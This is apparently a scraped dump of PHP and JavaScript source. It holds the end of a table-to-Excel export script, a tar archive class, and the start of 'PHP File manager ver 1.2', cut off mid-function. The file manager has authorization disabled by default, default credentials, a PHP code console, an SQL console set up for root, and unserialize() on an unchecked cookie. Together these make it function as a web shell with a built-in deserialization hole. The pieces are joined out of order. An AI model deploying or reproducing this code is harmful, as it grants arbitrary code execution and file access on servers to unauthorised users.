	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php 
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar
{
    var $archive_name = '';
    var $tmp_file = 0;
    var $file_pos = 0;
    var $isGzipped = true;
    var $errors = array();
    var $files = array();
    function __construct()
    {
        if (!isset($this->errors)) {
            $this->errors = array();
        }
    }
    function createArchive($file_list)
    {
        $result = false;
        if (file_exists($this->archive_name) && is_file($this->archive_name)) {
            $newArchive = false;
        } else {
            $newArchive = true;
        }
        if ($newArchive) {
            if (!$this->openWrite()) {
                return false;
            }
        } else {
            if (filesize($this->archive_name) == 0) {
                return $this->openWrite();
            }
            if ($this->isGzipped) {
                $this->closeTmpFile();
                if (!rename($this->archive_name, $this->archive_name . '.tmp')) {
                    $this->errors[] = __('Cannot rename') . ' ' . $this->archive_name . __(' to ') . $this->archive_name . '.tmp';
                    return false;
                }
                $tmpArchive = gzopen($this->archive_name . '.tmp', 'rb');
                if (!$tmpArchive) {
                    $this->errors[] = $this->archive_name . '.tmp ' . __('is not readable');
                    rename($this->archive_name . '.tmp', $this->archive_name);
                    return false;
                }
                if (!$this->openWrite()) {
                    rename($this->archive_name . '.tmp', $this->archive_name);
                    return false;
                }
                $buffer = gzread($tmpArchive, 512);
                if (!gzeof($tmpArchive)) {
                    do {
                        $binaryData = pack('a512', $buffer);
                        $this->writeBlock($binaryData);
                        $buffer = gzread($tmpArchive, 512);
                    } while (!gzeof($tmpArchive));
                }
                gzclose($tmpArchive);
                unlink($this->archive_name . '.tmp');
            } else {
                $this->tmp_file = fopen($this->archive_name, 'r+b');
                if (!$this->tmp_file) {
                    return false;
                }
            }
        }
        if (isset($file_list) && is_array($file_list)) {
            if (count($file_list) > 0) {
                $result = $this->packFileArray($file_list);
            }
        } else {
            $this->errors[] = __('No file') . __(' to ') . __('Archive');
        }
        if ($result && is_resource($this->tmp_file)) {
            $binaryData = pack('a512', '');
            $this->writeBlock($binaryData);
        }
        $this->closeTmpFile();
        if ($newArchive && !$result) {
            $this->closeTmpFile();
            unlink($this->archive_name);
        }
        return $result;
    }
    function restoreArchive($path)
    {
        $fileName = $this->archive_name;
        if (!$this->isGzipped) {
            if (file_exists($fileName)) {
                if ($fp = fopen($fileName, 'rb')) {
                    $data = fread($fp, 2);
                    fclose($fp);
                    if ($data == '\\37\\213') {
                        $this->isGzipped = true;
                    }
                }
            } elseif (substr($fileName, -2) == 'gz' or substr($fileName, -3) == 'tgz') {
                $this->isGzipped = true;
            }
        }
        $result = true;
        if ($this->isGzipped) {
            $this->tmp_file = gzopen($fileName, 'rb');
        } else {
            $this->tmp_file = fopen($fileName, 'rb');
        }
        if (!$this->tmp_file) {
            $this->errors[] = $fileName . ' ' . __('is not readable');
            return false;
        }
        $result = $this->unpackFileArray($path);
        $this->closeTmpFile();
        return $result;
    }
    function showErrors($message = '')
    {
        $Errors = $this->errors;
        if (count($Errors) > 0) {
            if (!empty($message)) {
                $message = ' (' . $message . ')';
            }
            $message = __('Error occurred') . $message . ': <br/>';
            foreach ($Errors as $value) {
                $message .= $value . '<br/>';
            }
            return $message;
        } else {
            return '';
        }
    }
    function packFileArray($file_array)
    {
        $result = true;
        if (!$this->tmp_file) {
            $this->errors[] = __('Invalid file descriptor');
            return false;
        }
        if (!is_array($file_array) || count($file_array) <= 0) {
            return true;
        }
        for ($i = 0; $i < count($file_array); $i++) {
            $filename = $file_array[$i];
            if ($filename == $this->archive_name) {
                continue;
            }
            if (strlen($filename) <= 0) {
                continue;
            }
            if (!file_exists($filename)) {
                $this->errors[] = __('No file') . ' ' . $filename;
                continue;
            }
            if (!$this->tmp_file) {
                $this->errors[] = __('Invalid file descriptor');
                return false;
            }
            if (strlen($filename) <= 0) {
                $this->errors[] = __('Filename') . ' ' . __('is incorrect');
                return false;
            }
            $filename = str_replace('\\', '/', $filename);
            $keep_filename = $this->makeGoodPath($filename);
            if (is_file($filename)) {
                if (($file = fopen($filename, 'rb')) == 0) {
                    $this->errors[] = __('Mode ') . __('is incorrect');
                }
                if ($this->file_pos == 0) {
                    if (!$this->writeHeader($filename, $keep_filename)) {
                        return false;
                    }
                }
                while (($buffer = fread($file, 512)) != '') {
                    $binaryData = pack('a512', $buffer);
                    $this->writeBlock($binaryData);
                }
                fclose($file);
            } else {
                $this->writeHeader($filename, $keep_filename);
            }
            if (@is_dir($filename)) {
                if (!($handle = opendir($filename))) {
                    $this->errors[] = __('Error') . ': ' . __('Directory ') . $filename . __('is not readable');
                    continue;
                }
                while (false !== ($dir = readdir($handle))) {
                    if ($dir != '.' && $dir != '..') {
                        $file_array_tmp = array();
                        if ($filename != '.') {
                            $file_array_tmp[] = $filename . '/' . $dir;
                        } else {
                            $file_array_tmp[] = $dir;
                        }
                        $result = $this->packFileArray($file_array_tmp);
                    }
                }
                unset($file_array_tmp);
                unset($dir);
                unset($handle);
            }
        }
        return $result;
    }
    function unpackFileArray($path)
    {
        $path = str_replace('\\', '/', $path);
        if ($path == '' || substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')) {
            $path = './' . $path;
        }
        clearstatcache();
        while (strlen($binaryData = $this->readBlock()) != 0) {
            if (!$this->readHeader($binaryData, $header)) {
                return false;
            }
            if ($header['filename'] == '') {
                continue;
            }
            if ($header['typeflag'] == 'L') {
                //reading long header
                $filename = '';
                $decr = floor($header['size'] / 512);
                for ($i = 0; $i < $decr; $i++) {
                    $content = $this->readBlock();
                    $filename .= $content;
                }
                if (($laspiece = $header['size'] % 512) != 0) {
                    $content = $this->readBlock();
                    $filename .= substr($content, 0, $laspiece);
                }
                $binaryData = $this->readBlock();
                if (!$this->readHeader($binaryData, $header)) {
                    return false;
                } else {
                    $header['filename'] = $filename;
                }
                return true;
            }
            if ($path != './' && $path != '/') {
                while (substr($path, -1) == '/') {
                    $path = substr($path, 0, strlen($path) - 1);
                }
                if (substr($header['filename'], 0, 1) == '/') {
                    $header['filename'] = $path . $header['filename'];
                } else {
                    $header['filename'] = $path . '/' . $header['filename'];
                }
            }
            if (file_exists($header['filename'])) {
                if (@is_dir($header['filename']) && $header['typeflag'] == '') {
                    $this->errors[] = __('File ') . $header['filename'] . __(' already exists') . __(' as folder');
                    return false;
                }
                if (is_file($header['filename']) && $header['typeflag'] == '5') {
                    $this->errors[] = __('Cannot create directory') . '. ' . __('File ') . $header['filename'] . __(' already exists');
                    return false;
                }
                if (!is_writeable($header['filename'])) {
                    $this->errors[] = __('Cannot write to file') . '. ' . __('File ') . $header['filename'] . __(' already exists');
                    return false;
                }
            } elseif ($this->dirCheck($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])) != 1) {
                $this->errors[] = __('Cannot create directory') . ' ' . __(' for ') . $header['filename'];
                return false;
            }
            if ($header['typeflag'] == '5') {
                if (!file_exists($header['filename'])) {
                    if (!mkdir($header['filename'], 0777)) {
                        $this->errors[] = __('Cannot create directory') . ' ' . $header['filename'];
                        return false;
                    }
                }
            } else {
                if (($destination = fopen($header['filename'], 'wb')) == 0) {
                    $this->errors[] = __('Cannot write to file') . ' ' . $header['filename'];
                    return false;
                } else {
                    $decr = floor($header['size'] / 512);
                    for ($i = 0; $i < $decr; $i++) {
                        $content = $this->readBlock();
                        fwrite($destination, $content, 512);
                    }
                    if ($header['size'] % 512 != 0) {
                        $content = $this->readBlock();
                        fwrite($destination, $content, $header['size'] % 512);
                    }
                    fclose($destination);
                    touch($header['filename'], $header['time']);
                }
                clearstatcache();
                if (filesize($header['filename']) != $header['size']) {
                    $this->errors[] = __('Size of file') . ' ' . $header['filename'] . ' ' . __('is incorrect');
                    return false;
                }
            }
            if (($file_dir = dirname($header['filename'])) == $header['filename']) {
                $file_dir = '';
            }
            if (substr($header['filename'], 0, 1) == '/' && $file_dir == '') {
                $file_dir = '/';
            }
            $this->dirs[] = $file_dir;
            $this->files[] = $header['filename'];
        }
        return true;
    }
    function dirCheck($dir)
    {
        $parent_dir = dirname($dir);
        if (@is_dir($dir) or $dir == '') {
            return true;
        }
        if ($parent_dir != $dir and $parent_dir != '' and !$this->dirCheck($parent_dir)) {
            return false;
        }
        if (!mkdir($dir, 0777)) {
            $this->errors[] = __('Cannot create directory') . ' ' . $dir;
            return false;
        }
        return true;
    }
    function readHeader($binaryData, &$header)
    {
        if (strlen($binaryData) == 0) {
            $header['filename'] = '';
            return true;
        }
        if (strlen($binaryData) != 512) {
            $header['filename'] = '';
            $this->__('Invalid block size') . ': ' . strlen($binaryData);
            return false;
        }
        $checksum = 0;
        for ($i = 0; $i < 148; $i++) {
            $checksum += ord(substr($binaryData, $i, 1));
        }
        for ($i = 148; $i < 156; $i++) {
            $checksum += 32;
        }
        for ($i = 156; $i < 512; $i++) {
            $checksum += ord(substr($binaryData, $i, 1));
        }
        $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);
        $header['checksum'] = OctDec(trim($unpack_data['checksum']));
        if ($header['checksum'] != $checksum) {
            $header['filename'] = '';
            if ($checksum == 256 && $header['checksum'] == 0) {
                return true;
            }
            $this->errors[] = __('Error checksum for file ') . $unpack_data['filename'];
            return false;
        }
        if (($header['typeflag'] = $unpack_data['typeflag']) == '5') {
            $header['size'] = 0;
        }
        $header['filename'] = trim($unpack_data['filename']);
        $header['mode'] = OctDec(trim($unpack_data['mode']));
        $header['user_id'] = OctDec(trim($unpack_data['user_id']));
        $header['group_id'] = OctDec(trim($unpack_data['group_id']));
        $header['size'] = OctDec(trim($unpack_data['size']));
        $header['time'] = OctDec(trim($unpack_data['time']));
        return true;
    }
    function writeHeader($filename, $keep_filename)
    {
        $packF = 'a100a8a8a8a12A12';
        $packL = 'a1a100a6a2a32a32a8a8a155a12';
        if (strlen($keep_filename) <= 0) {
            $keep_filename = $filename;
        }
        $filename_ready = $this->makeGoodPath($keep_filename);
        if (strlen($filename_ready) > 99) {
            //write long header
            $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
            $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');
            //  Calculate the checksum
            $checksum = 0;
            //  First part of the header
            for ($i = 0; $i < 148; $i++) {
                $checksum += ord(substr($dataFirst, $i, 1));
            }
            //  Ignore the checksum value and replace it by ' ' (space)
            for ($i = 148; $i < 156; $i++) {
                $checksum += 32;
            }
            //  Last part of the header
            for ($i = 156, $j = 0; $i < 512; $i++, $j++) {
                $checksum += ord(substr($dataLast, $j, 1));
            }
            //  Write the first 148 bytes of the header in the archive
            $this->writeBlock($dataFirst, 148);
            //  Write the calculated checksum
            $checksum = sprintf('%6s ', DecOct($checksum));
            $binaryData = pack('a8', $checksum);
            $this->writeBlock($binaryData, 8);
            //  Write the last 356 bytes of the header in the archive
            $this->writeBlock($dataLast, 356);
            $tmp_filename = $this->makeGoodPath($filename_ready);
            $i = 0;
            while (($buffer = substr($tmp_filename, $i++ * 512, 512)) != '') {
                $binaryData = pack('a512', $buffer);
                $this->writeBlock($binaryData);
            }
            return true;
        }
        $file_info = stat($filename);
        if (@is_dir($filename)) {
            $typeflag = '5';
            $size = sprintf('%11s ', DecOct(0));
        } else {
            $typeflag = '';
            clearstatcache();
            $size = sprintf('%11s ', DecOct(filesize($filename)));
        }
        $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
        $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
        $checksum = 0;
        for ($i = 0; $i < 148; $i++) {
            $checksum += ord(substr($dataFirst, $i, 1));
        }
        for ($i = 148; $i < 156; $i++) {
            $checksum += 32;
        }
        for ($i = 156, $j = 0; $i < 512; $i++, $j++) {
            $checksum += ord(substr($dataLast, $j, 1));
        }
        $this->writeBlock($dataFirst, 148);
        $checksum = sprintf('%6s ', DecOct($checksum));
        $binaryData = pack('a8', $checksum);
        $this->writeBlock($binaryData, 8);
        $this->writeBlock($dataLast, 356);
        return true;
    }
    function openWrite()
    {
        if ($this->isGzipped) {
            $this->tmp_file = gzopen($this->archive_name, 'wb9f');
        } else {
            $this->tmp_file = fopen($this->archive_name, 'wb');
        }
        if (!$this->tmp_file) {
            $this->errors[] = __('Cannot write to file') . ' ' . $this->archive_name;
            return false;
        }
        return true;
    }
    function readBlock()
    {
        if (is_resource($this->tmp_file)) {
            if ($this->isGzipped) {
                $block = gzread($this->tmp_file, 512);
            } else {
                $block = fread($this->tmp_file, 512);
            }
        } else {
            $block = '';
        }
        return $block;
    }
    function writeBlock($data, $length = 0)
    {
        if (is_resource($this->tmp_file)) {
            if ($length === 0) {
                if ($this->isGzipped) {
                    gzputs($this->tmp_file, $data);
                } else {
                    fputs($this->tmp_file, $data);
                }
            } else {
                if ($this->isGzipped) {
                    gzputs($this->tmp_file, $data, $length);
                } else {
                    fputs($this->tmp_file, $data, $length);
                }
            }
        }
    }
    function closeTmpFile()
    {
        if (is_resource($this->tmp_file)) {
            if ($this->isGzipped) {
                gzclose($this->tmp_file);
            } else {
                fclose($this->tmp_file);
            }
            $this->tmp_file = 0;
        }
    }
    function makeGoodPath($path)
    {
        if (strlen($path) > 0) {
            $path = str_replace('\\', '/', $path);
            $partPath = explode('/', $path);
            $els = count($partPath) - 1;
            for ($i = $els; $i >= 0; $i--) {
                if ($partPath[$i] == '.') {
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..') {
                    $i--;
                } elseif ($partPath[$i] == '' and $i != $els and $i != 0) {
                } else {
                    $result = $partPath[$i] . ($i != $els ? '/' . $result : '');
                }
            }
        } else {
            $result = '';
        }
        return $result;
    }
}


Original code

<?php
/* PHP File manager ver 1.2 */

// Configuration — do not change manually!
$authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"http:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
// end configuration

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.1;

//Authorization
$auth = json_decode($authorization,true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; 
$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


// Localization
if ($language=='ru') {
$lang['Add']='Добавить';
$lang['Are you sure you want to delete this directory (recursively)?']='Вы уверены, что хотите удалить эту папку (рекурсивно)?';
$lang['Are you sure you want to delete this file?']='Вы уверены, что хотите удалить этот файл?';
$lang['Archiving']='Архивировать';
$lang['Authorization']='Авторизация';
$lang['Back']='Назад';
$lang['Cancel']='Отмена';
$lang['Chinese']='Китайский';
$lang['Compress']='Сжать';
$lang['Console']='Консоль';
$lang['Cookie']='Куки';
$lang['Created']='Создан';
$lang['Date']='Дата';
$lang['Days']='Дней';
$lang['Decompress']='Распаковать';
$lang['Delete']='Удалить';
$lang['Deleted']='Удалено';
$lang['Download']='Скачать';
$lang['done']='закончена';
$lang['Edit']='Редактировать';
$lang['Enter']='Вход';
$lang['English']='Английский';
$lang['Error occurred']='Произошла ошибка';
$lang['File manager']='Файловый менеджер';
$lang['File selected']='Выбран файл';
$lang['File updated']='Файл сохранен';
$lang['Filename']='Имя файла';
$lang['Files uploaded']='Файл загружен';
$lang['French']='Французский';
$lang['German']='Немецкий';
$lang['Generation time']='Генерация страницы';
$lang['Home']='Домой';
$lang['Quit']='Выход';
$lang['Language']='Язык';
$lang['Login']='Логин';
$lang['Manage']='Управление';
$lang['Make directory']='Создать папку';
$lang['Name']='Наименование';
$lang['New']='Новое';
$lang['New file']='Новый файл';
$lang['no files']='нет файлов';
$lang['Password']='Пароль';
$lang['pictures']='изображения';
$lang['Recursively']='Рекурсивно';
$lang['Rename']='Переименовать';
$lang['Reset']='Сбросить';
$lang['Reset settings']='Сбросить настройки';
$lang['Result']='Результат';
$lang['Rights']='Права';
$lang['Russian']='Русский';
$lang['Save']='Сохранить';
$lang['Select']='Выберите';
$lang['Select the file']='Выберите файл';
$lang['Settings']='Настройка';
$lang['Show']='Показать';
$lang['Size']='Размер';
$lang['Spanish']='Испанский';
$lang['Submit']='Отправить';
$lang['Task']='Задача';
$lang['templates']='шаблоны';
$lang['Show size of the folder']='Показать размер папки';
$lang['Ukrainian']='Украинский';
$lang['Upload']='Загрузить';
$lang['Value']='Значение';
$lang['Hello']='Привет';
} elseif ($language=='de') {
$lang['Add']='Add';
$lang['Are you sure you want to delete this directory (recursively)'] = 'Sind Sie sicher, dass Sie diesen Ordner löschen möchten (rekursiv)?';
$lang['Are you sure you want to delete this file?'] = 'Sind Sie sicher, dass Sie diese Datei löschen möchten?';
$lang['Archiving'] = 'Archivierung';
$lang['Authorization']='Genehmigung';
$lang['Back'] = 'Zurück';
$lang['Cancel'] = 'Abbrechen';
$lang['Chinese']='Chinesische';
$lang['Compress'] = 'Compress';
$lang['Console'] = 'Console';
$lang['Cookie']='Cookie';
$lang['Created'] = 'Erstellt';
$lang['Date'] = 'Datum';
$lang['Days'] = 'Tage';
$lang['Decompress'] = 'Extract';
$lang['Delete'] = 'Löschen';
$lang['Deleted'] = 'Gelöschte';
$lang['Download'] = 'Laden';
$lang['done'] = 'fertig';
$lang['Edit'] = 'Bearbeiten';
$lang['Enter'] = 'Eintrag';
$lang['Englisch'] = 'Englisch';
$lang['Error occurred'] = 'Ein Fehler ist aufgetreten';
$lang['File manager'] = 'Datei Manager';
$lang['File selected'] = 'Die ausgewählte Datei';
$lang['File updated'] = 'Die Datei wird gespeichert';
$lang['Filename'] = 'Dateiname';
$lang['Files uploaded'] = 'Datei hochgeladen';
$lang['French'] = 'Französisch';
$lang['Generation time'] = 'Generation Zeit';
$lang['German']='Deutche';
$lang['Home'] = 'Home';
$lang['Quit'] = 'Abmelden';
$lang['Language'] = 'Sprache';
$lang['Login'] = 'Login';
$lang['Manage'] = 'Management';
$lang['Make directory'] = 'Neuer Ordner';
$lang['Name']='Name';
$lang['New']='Neu';
$lang['New file'] = 'Neue Datei';
$lang['no files'] = 'keine Dateien';
$lang['Password'] = 'Passwort';
$lang['pictures'] = 'Bilder';
$lang['Recursively'] = 'rekursive';
$lang['Reset']='Zurücksetzen';
$lang['Rename'] = 'Umbenennen';
$lang['Reset settings']='Einstellungen zurücksetzen';
$lang['Result']='Result';
$lang['Ergebnis'] = 'Ergebnis';
$lang['Rights'] = 'Rechte';
$lang['Russian'] = 'Russisch';
$lang['Save']='Speichern';
$lang['Select'] = 'Wählen';
$lang['Select the file'] = 'Wählen Sie die Datei';
$lang['Settings']='Einstellungen';
$lang['Show'] = 'Show';
$lang['Show size of the folder'] = 'Größe des Ordners anzeigen';
$lang['Size'] = 'Größe';
$lang['Spanish']='Spanisch';
$lang['Submit'] = 'Senden';
$lang['Task'] = 'Aufgabe';
$lang['templates']='Vorlagen';
$lang['Ukrainian'] = 'Ukrainisch';
$lang['Upload'] = 'Upload';
$lang['Value']='Wert';
$lang['Hello'] = 'Hallo';
} elseif ($language=='fr') {
$lang['Add']='Ajouter';
$lang['Are you sure you want to delete this directory (recursively)?']='Êtes-vous sûr de vouloir supprimer ce dossier (récursive)?';
$lang['Are you sure you want to delete this file?']='Êtes-vous sûr de vouloir supprimer ce fichier?';
$lang['Archiving']='Archives';
$lang['Authorization']='Autorisation';
$lang['Back']='Arrière';
$lang['Cancel']='annulation';
$lang['Chinese']='Chinois';
$lang['Compress']='Presser';
$lang['Console']='Console';
$lang['Cookie']='Cookie';
$lang['Created']='Êtabli';
$lang['Date']='La date';
$lang['Days']='Journées';
$lang['Decompress']='Décompresser';
$lang['Delete']='Supprimer';
$lang['Deleted']='Supprimé';
$lang['Download']='Télécharger';
$lang['done']='terminé';
$lang['Edit']='Editer';
$lang['Enter']='Entrée';
$lang['English']='Anglais';
$lang['Error occurred']='Une erreur est survenue';
$lang['File manager']='Gestionnaire de fichiers';
$lang['File selected']='Fichier sélectionné';
$lang['File updated']='Le fichier est enregistré';
$lang['Filename']='Nom du fichier';
$lang['Files uploaded']='Fichiers uploadés';
$lang['French']='Française';
$lang['Generation time']='Génération de la page';
$lang['German']='Allemand';
$lang['Home']='Home';
$lang['Quit']='Quitter';
$lang['Language']='Langue';
$lang['Login']='Connexion';
$lang['Manage']='Gestion';
$lang['Make directory']='Nouveau dossier';
$lang['Name']='Nom';
$lang['New']='Nouveau';
$lang['New file']='Nouveau fichier';
$lang['no files']='aucun fichier';
$lang['Password']='Mot de passe';
$lang['pictures']='des photos';
$lang['Recursively']='Récursive';
$lang['Rename']='Renommer';
$lang['Reset']='Réinitialiser';
$lang['Reset settings']='Réinitialiser les paramètres';
$lang['Result']='Résultat';
$lang['Rights']='Permissions';
$lang['Russian']='Russe';
$lang['Save']='Enregistrer';
$lang['Select']='Sélectionnez';
$lang['Select the file']='Sélectionnez le fichier';
$lang['Settings']='Réglages';
$lang['Show']='Show';
$lang['Show size of the folder']='Afficher la taille du dossier';
$lang['Size']='Taille';
$lang['Spanish']='Espagnol';
$lang['Submit']='Envoyer';
$lang['Task']='Tâche';
$lang['templates']='templates';
$lang['Ukrainian']='Ukrainien';
$lang['Upload']='Télécharger';
$lang['Value']='Valeur';
$lang['Hello']='Bonjour';
} else if ($language=='uk') {
$lang['Add']='Додати';
$lang['Are you sure you want to delete this directory (recursively)?']='Ви впевнені, що бажаєте видалити цю папку (рекурсивно)?';
$lang['Are you sure you want to delete this file?']='Ви впевнені, що бажаєте видалити цей файл?';
$lang['Archiving']='Архівувати';
$lang['Authorization']='Авторизація';
$lang['Back']='Назад';
$lang['Cancel']='Відміна';
$lang['Chinese']='Китайська';
$lang['Compress']='Сжати';
$lang['Console']='Консоль';
$lang['Cookie']='Кукi';
$lang['Created']='Створений';
$lang['Date']='Дата';
$lang['Date']='Днiв';
$lang['Decompress']='Розпакувати';
$lang['Delete']='Видалити';
$lang['Deleted']='Видалено';
$lang['Download']='Скачати';
$lang['done']='закінчено';
$lang['Edit']='Редагувати';
$lang['Enter']='Вхід';
$lang['English']='Англійська';
$lang['Error occurred']='Виникла помилка';
$lang['File manager']='Файловий менеджер';
$lang['File selected']='Обрано файл';
$lang['File updated']='Файл збережено';
$lang['Filename']='Им\'я файла';
$lang['Files uploaded']='Файл завантажено';
$lang['French']='Французська';
$lang['Generation time']='Генерація сторінки';
$lang['German']='Німецька';
$lang['Home']='Додому';
$lang['Quit']='Вихід';
$lang['Language']='Мова';
$lang['Login']='Логін';
$lang['Manage']='Управління';
$lang['Make directory']='Створити папку';
$lang['Name']='Найменування';
$lang['New']='Нове';
$lang['New file']='Новий файл';
$lang['no files']='немає файлів';
$lang['Password']='Пароль';
$lang['pictures']='фотографії';
$lang['Recursively']='Рекурсивно';
$lang['Rename']='Перейменувати';
$lang['Reset']='Скидання';
$lang['Reset settings']='Скинути налаштування';
$lang['Result']='Результат';
$lang['Rights']='Права';
$lang['Russian']='Російська';
$lang['Save']='Зберегти';
$lang['Select']='Виберіть';
$lang['Select the file']='Виберіть файл';
$lang['Settings']='Налаштування';
$lang['Show']='Показати';
$lang['Show size of the folder']='Показати розмір папки';
$lang['Size']='Розмір';
$lang['Spanish']='Іспанська';
$lang['Submit']='Відправити';
$lang['Task']='Завдання';
$lang['templates']='шаблони';
$lang['Ukrainian']='Українська';
$lang['Upload']='Завантажити';
$lang['Value']='Значення';
$lang['Hello']='Вітаю';
}

/* Functions */

//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
